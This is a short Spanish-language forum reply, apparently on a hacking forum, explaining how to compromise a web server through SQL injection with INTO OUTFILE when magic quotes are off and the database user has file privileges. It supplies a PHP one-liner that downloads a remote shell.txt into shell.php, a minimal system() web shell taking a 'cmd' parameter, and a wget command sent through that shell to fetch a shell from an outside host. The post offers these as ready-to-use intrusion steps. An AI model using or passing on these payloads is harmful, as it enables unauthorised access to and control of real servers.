hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.
Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.
Y en este Post:
http://foro.undersecurity.net/read.php?15,772E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica.
Por ej En el Source a Insertar. Ingresar.
<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>
Tambien Se Puede pasar a Hexa SQL para no tener dramas con las " "
En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente
<? system($_REQUEST['cmd']); ?>
y Luego con Wget
wget -c --output-document=shell.php www.script.com/shell.txt
Asi Kedaria
http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt
Y Vuala ¡
Saludos¡